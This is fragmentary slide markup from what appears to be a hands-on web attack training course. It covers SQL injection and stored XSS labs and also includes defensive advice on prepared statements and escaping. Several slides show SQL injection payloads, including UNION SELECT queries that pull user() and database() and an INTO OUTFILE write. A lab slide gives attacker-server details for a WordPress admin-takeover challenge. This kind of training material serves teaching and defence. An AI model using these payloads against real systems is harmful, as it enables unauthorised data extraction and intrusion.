            <a:ext cx="3200401" cy="0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25440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3772"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3736785"/>
            <a:ext cx="7467600" cy="248940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UNION SELECT SQL Injection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9059"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="838200"/>
            <a:ext cx="7467600" cy="27431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24/31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871239" y="1097280"/>
            <a:ext cx="6358361" cy="0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 bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="1886712"/>
            <a:ext cx="5486400" cy="53340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143000" y="2474100"/>
            <a:ext cx="5867400" cy="49770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066800" y="4323148"/>
            <a:ext cx="2209800" cy="139185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581400" y="4323147"/>
            <a:ext cx="2743200" cy="139185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871239" y="4038600"/>
            <a:ext cx="5139161" cy="0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27592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Common Questions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What should I expect from this training?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty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Insights of how an attacker think and act</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty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Labs, lots of labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2400" dirty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What shouldn’t I expect from this training?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty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Anything defensive (ex: secure coding, security architect, web framework security)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46368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UNION SELECT SQL Injection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5" y="935182"/>
            <a:ext cx="9144000" cy="358877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295400" y="5029200"/>
            <a:ext cx="7488600" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -1631"/>
              <a:gd name="adj2" fmla="val -108195"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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9822" y="5105400"/>
            <a:ext cx="7239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UNION SELECT is only successful with the correct number of columns.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25/31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838200" y="1143000"/>
            <a:ext cx="3962400" cy="0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8200" y="1600200"/>
            <a:ext cx="4343400" cy="0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38200" y="3810000"/>
            <a:ext cx="4648200" cy="0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38200" y="4267200"/>
            <a:ext cx="4953000" cy="0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676025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UNION SELECT SQL Injection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000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50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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>books</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>title=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mybook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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26/31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0672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UNION SELECT SQL Injection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000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50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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>books</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>title=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mybook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ UNION SELECT 1,2,3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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27/31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25373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UNION SELECT SQL Injection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000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250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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>books</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>title=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mybook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>database()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,3’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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28/31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537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UNION SELECT SQL Injection</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP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1700748"/>
            <a:ext cx="85679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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>books</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>title=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mybook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x,y,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4800" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()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br>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INTO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FILE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/dump’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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29/31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6513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Questions so far?</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP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2432537"/>
            <a:ext cx="3161295" cy="35814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 bwMode="auto">
          <a:xfrm>
            <a:off x="3648456" y="1143000"/>
            <a:ext cx="5135544" cy="2514600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -59666"/>
              <a:gd name="adj2" fmla="val 81284"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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48456" y="1401485"/>
            <a:ext cx="4953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So today you’ve learned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - Basic SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Multibyte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - UNION SELECT attack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30/31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92407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General </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t> Defenses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b="1" dirty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Proper escape</a:t>
            </a:r>
          </a:p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SQL injection happens because user input got included into query string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Use the language/framework’s escape function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Never invent escape function by yourself!</a:t>
            </a:r>
          </a:p>
          <a:p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  <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" b="1" dirty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Use Prepared Statement</a:t>
            </a:r>
          </a:p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User input will not be handled as a part of the SQL command</a:t>
            </a:r>
          </a:p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Example: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5029200"/>
            <a:ext cx="8115300" cy="762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5181600" y="5029200"/>
            <a:ext cx="3278188" cy="381000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3066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Reference - OWASP Top 10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A1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="ja-JP" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r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 Injection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SQL, Command, Code, LDAP, XPath and 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etc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 </a:t>
            </a:r>
          </a:p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Preventions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Use of parameterized API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Escape special characters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Input whitelisting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OWASP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: https://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www.owasp.org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/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index.php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/Top_10_2013-A1-Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>SQL Injection Prevention Cheat Sheet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: https://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www.owasp.org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/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index.php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/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SQL_Injection_Prevention_Cheat_Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000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10/22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90638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00" y="2529417"/>
            <a:ext cx="7772400" cy="356113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Hands On Time</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" alt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84213" y="914400"/>
            <a:ext cx="8099787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altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>A vulnerable web site with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" altLang="ja-JP" sz="2400" b="1" dirty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4 challenge stages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> is given</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>You can proceed to the next stage </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="da-DK" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="da-DK" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>when the SQL Injection is successfully exploited</a:t>
            </a:r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31/31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5415643" y="2407445"/>
            <a:ext cx="2933700" cy="685802"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -71746"/>
              <a:gd name="adj2" fmla="val -2011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91038" y="2509586"/>
            <a:ext cx="3710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SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Payload here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3962400" y="5779040"/>
            <a:ext cx="3581400" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -68430"/>
              <a:gd name="adj2" fmla="val -33180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7018" y="5858841"/>
            <a:ext cx="3449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Once succeed, link to next stage will appear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97517" y="3496558"/>
            <a:ext cx="2758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Example Link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1168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Hands On Time</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP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828800"/>
            <a:ext cx="4267200" cy="42672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 bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="1828800"/>
            <a:ext cx="4516800" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -60036"/>
              <a:gd name="adj2" fmla="val 15652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2012245"/>
            <a:ext cx="41253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Your journey starts at:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://LabIP:8081/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eef4a6d53c97b055136d e86e412b42ac</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" u="sng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altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>14:45 ~ 15:15 : Lab time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>15:15 ~ 15:25 : Solution sharing</a:t>
            </a:r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31/31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35CA698-B77F-4553-B97C-437F8DAF5161}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4064438" y="4561954"/>
            <a:ext cx="4719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Check the Lab Info in Box!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4518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2438400"/>
            <a:ext cx="800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Cross Site Scripting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01/22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6D9B9EE-4C75-4FD6-ABDB-AF231C9ED4B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="3657600"/>
            <a:ext cx="472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&lt;13:20 ~ 14:20&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>13:20 ~ 13:40 : Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>13:40 ~ 14:10 : Hands on lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>14:10 ~ 14:20 : Solution sharing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51082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143000"/>
            <a:ext cx="6248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Break Time !!!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2134751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15:30 ~ 15:40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0" y="2842637"/>
            <a:ext cx="4330700" cy="31369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25027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2387263"/>
            <a:ext cx="7391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Challenge Time !!!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C4363CC-61E4-49CB-8099-E966210C9E76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="3657600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&lt;</a:t>
            </a:r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15:40 ~ 16:30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>15:40 ~ 16:20 : Hands on lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>16:20 ~ 16:30 : Solution sharing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37953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auto">
          <a:xfrm>
            <a:off x="685800" y="3657600"/>
            <a:ext cx="7620000" cy="25908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Challenge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Challenge: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A Vulnerable WordPress with XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>The goal:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> to login as the WordPress admin (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-admin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>http://LabIP:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10001/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Attacker servers: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SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>LabIP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–p 443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credential: root / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>strongsshpassword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Web server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>http://LabIP:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/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93" y="4025899"/>
            <a:ext cx="1460501" cy="1460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4802" y="4025899"/>
            <a:ext cx="1460501" cy="14605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2973" y="3657600"/>
            <a:ext cx="103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29894" y="3657600"/>
            <a:ext cx="254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Victim WordPress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4583" y="5431304"/>
            <a:ext cx="2584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SSH on port 443</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with Apache on port 80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93725" y="5455822"/>
            <a:ext cx="1543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victim admin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Left-Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5879433" y="4579949"/>
            <a:ext cx="854280" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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5795618" y="2438400"/>
            <a:ext cx="2988382" cy="1116308"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8684"/>
              <a:gd name="adj2" fmla="val 105689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47316" y="2484358"/>
            <a:ext cx="2836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 have no life so I check my blog dashboard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>every 15 seconds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46385" y="5486400"/>
            <a:ext cx="2584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stored XSS with Activity Log plugin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Left-Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2753099" y="4579949"/>
            <a:ext cx="1332407" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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FC8FBC47-B668-446B-B697-583FF3004EB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505200" y="3886200"/>
            <a:ext cx="0" cy="1962835"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:prstDash val="lgDash"/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med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8106B2E9-67B5-47B0-8741-923DEC2A8F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843" y="4208967"/>
            <a:ext cx="1125033" cy="11250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58CD534-58B9-489D-A453-A28E0AB7695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5" t="298" r="20364" b="-298"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="124249" y="3886200"/>
            <a:ext cx="1066800" cy="1066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10815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 Instructions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3528" y="1447800"/>
